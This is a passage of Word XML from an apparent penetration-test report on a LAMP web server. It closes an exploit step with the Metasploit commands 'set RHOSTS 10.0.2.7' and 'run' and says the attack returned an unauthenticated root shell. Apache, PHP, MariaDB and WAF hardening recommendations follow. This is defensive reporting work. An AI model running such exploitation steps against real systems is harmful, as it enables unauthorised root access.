      <w:r w:rsidRPr="008511CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set RHOSTS 10.0.2.7</w:t>
      </w:r>
      <w:r w:rsidR="008511CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4CDA34" w14:textId="63302229" w:rsidR="004553C6" w:rsidRPr="008511CE" w:rsidRDefault="004553C6" w:rsidP="004553C6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008511CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A49DC73" w14:textId="08717308" w:rsidR="00C409EF" w:rsidRDefault="00C409EF" w:rsidP="004553C6">
      <w:r w:rsidRPr="00C409EF">
        <w:t xml:space="preserve">This exploit was successful, requiring no authentication. Running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C409EF">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C409EF">
        <w:t xml:space="preserve"> in the returned shell verified that it was root — thus giving complete administrative privileges to the target server (Rapid7, 2024)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Refer Appendix I)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C409EF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B80AAA" w14:textId="13D12A20" w:rsidR="003C6ED6" w:rsidRDefault="00797F43" w:rsidP="004553C6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25894D06" wp14:editId="7EED8F81">
            <wp:extent cx="4251960" cy="10344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extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4320942" cy="1051272"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBC6F38" w14:textId="6D18CB6E" w:rsidR="00797F43" w:rsidRDefault="003C6ED6" w:rsidP="003C6ED6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00DE55B6">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00564BD6">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585224B2" w14:textId="3C0CCAFD" w:rsidR="006829ED" w:rsidRPr="00564BD6" w:rsidRDefault="00000000" w:rsidP="006829ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="3DACC819">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:bookmarkStart w:id="19" w:name="_Toc228099277"/>
      <w:bookmarkStart w:id="20" w:name="_Toc231851431"/>
    </w:p>
    <w:p w14:paraId="3E62B6D1" w14:textId="5BA38EA9" w:rsidR="0037549E" w:rsidRDefault="002A2075" w:rsidP="00C12BFE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="002A2075">
        <w:lastRenderedPageBreak/>
        <w:t>Mitigations and Hardening Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="541214F7" w14:textId="24FCC9B5" w:rsidR="00985411" w:rsidRPr="007A51D1" w:rsidRDefault="007A51D1" w:rsidP="0037549E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The defensive strategies below will create a solid </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D55EEB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D55EEB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-in-Depth approach</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilising the vulnerabilities identified during test. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389EDF80" w14:textId="29DEFC18" w:rsidR="007A51D1" w:rsidRPr="007A51D1" w:rsidRDefault="007A51D1" w:rsidP="007A51D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED7903">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>1. Application-Level Mitigations:</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7903">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacking vulnerabilities on the core web application, such as SQL Injection (SQLi) and Cross-Site Scripting (XSS), should be addressed at the application level within the application code: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2989A9" w14:textId="2378719F" w:rsidR="007A51D1" w:rsidRDefault="007A51D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C12BFE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stop SQLi:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Prepared Statements (Parameterized Queries) in all MariaDB communication. This will make the database see the input as a data parameter, and not code</w:t>
      </w:r>
      <w:r w:rsidR="005331EA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005331EA" w:rsidRPr="005331EA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(OWASP Foundation, 2024)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A3FF84" w14:textId="368A6FC1" w:rsidR="005331EA" w:rsidRPr="005331EA" w:rsidRDefault="007A51D1" w:rsidP="005331EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C12BFE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Input/Output Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Validate on the server side with robust allow lists. To prevent XSS, perform output encoding at the right time and place by using the context-aware approach. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFE2E48" w14:textId="46377D4D" w:rsidR="007A51D1" w:rsidRDefault="007A51D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C12BFE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Browser Security:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enable a strict Content Security Policy (CSP) header to prevent unauthorized sources of scripts. Attach the flag </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to all session cookies to make sure that it is impossible to steal the token with scripts</w:t>
      </w:r>
      <w:r w:rsidR="005331EA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005331EA" w:rsidRPr="005331EA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(OWASP Foundation, 2024)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B82FC3" w14:textId="606B7D13" w:rsidR="00985411" w:rsidRPr="00ED7903" w:rsidRDefault="007A51D1" w:rsidP="00985411">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C12BFE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rate Limiting and Account Locking:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use rate limit and account lock down features on the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> page to block automated /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks such as those from Hydra. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F05C903" w14:textId="77777777" w:rsidR="007A51D1" w:rsidRDefault="007A51D1" w:rsidP="007A51D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED7903">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>2. Infrastructure and Server Hardening (LAMP Stack):</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7903">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuration changes of the underlying Ubuntu server ecosystem need to be made to structurally shrink the attack surface of the Ubuntu server ecosystem, also known as LAMP Stack: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D2B84" w14:textId="41523CAA" w:rsidR="007A51D1" w:rsidRDefault="007A51D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00430801">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>To prevent file enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, add Options -Indexes to apache2.conf in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> hardening file. Reduce software packets like Nmap or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> by using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ServerTokens</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prod as well as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ServerSignature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Off</w:t>
      </w:r>
      <w:r w:rsidR="005E4038">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E4038" w:rsidRPr="005E4038">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(Apache Software Foundation, 2024)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F66FE73" w14:textId="12074A9A" w:rsidR="007A51D1" w:rsidRDefault="007A51D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00430801">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PHP Hardening:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Change the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>display_errors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Off in the php.ini file. Using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>disable_functions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = exec, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, system directive can deny system entry risks</w:t>
      </w:r>
      <w:r w:rsidR="005E4038">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E4038" w:rsidRPr="005E4038">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(The PHP Group, 2024)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABD5D9D" w14:textId="5DB08CC1" w:rsidR="007A51D1" w:rsidRDefault="007A51D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00430801">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database Least Privilege:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Production deployments involve limiting the environment of MariaDB. And set up “no access to broad data” privileges (GRANT ALL PRIVILEGES), give only minimum privileges needed (SELECT, INSERT, UPDATE), deny access to remote users as root, and bind the service to localhost only</w:t>
      </w:r>
      <w:r w:rsidR="00E54CD8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E54CD8" w:rsidRPr="00E54CD8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(MariaDB Foundation, 2024)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2E5AEB" w14:textId="191DB6AA" w:rsidR="00985411" w:rsidRPr="00ED7903" w:rsidRDefault="007A51D1" w:rsidP="00985411">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00430801">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enforced HTTPS:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Force all Internet traffic up to HTTPS. This ensures that any credentials or session states captured by a packet sniffer, such as Wireshark, are totally inaccessible</w:t>
      </w:r>
      <w:r w:rsidR="00ED7903">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED7903" w:rsidRPr="00ED7903">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(Orebaugh et al., 2006)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36131415" w14:textId="77777777" w:rsidR="007A51D1" w:rsidRDefault="007A51D1" w:rsidP="007A51D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED7903">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>3. Network Defences and Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7903">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61043807" w14:textId="657D408A" w:rsidR="007A51D1" w:rsidRDefault="007A51D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00430801">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web Application Firewall (WAF):</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Install an Inline WAF such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> on your web </w:t>
      </w:r>
      <w:r w:rsidR="00C12BFE" w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>server and</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> use it to block malicious payloads created by exploit frameworks like Burp Suite and Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00ED7903">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED7903" w:rsidRPr="00ED7903">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(Scarfone et al., 2008)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C5E64C" w14:textId="77777777" w:rsidR="007A51D1" w:rsidRDefault="007A51D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00430801">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Isolate the backend database:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Specify that no outgoing connections can be made over the network from anything to Port 3306 by using host-based firewall rules. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37455754" w14:textId="28CE26A4" w:rsidR="007A51D1" w:rsidRPr="00C12BFE" w:rsidRDefault="007A51D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00430801">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Log Auditing:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Monitor Apache, PHP and MariaDB logs regularly to track failed logins, unusual or suspicious request patterns, and web injection activity</w:t>
      </w:r>
      <w:r w:rsidR="00ED7903">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED7903" w:rsidRPr="00ED7903">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(Scarfone et al., 2008)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A51D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EE7937" w14:textId="7839D766" w:rsidR="00161769" w:rsidRDefault="00000000" w:rsidP="0037549E">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="43D95E98">
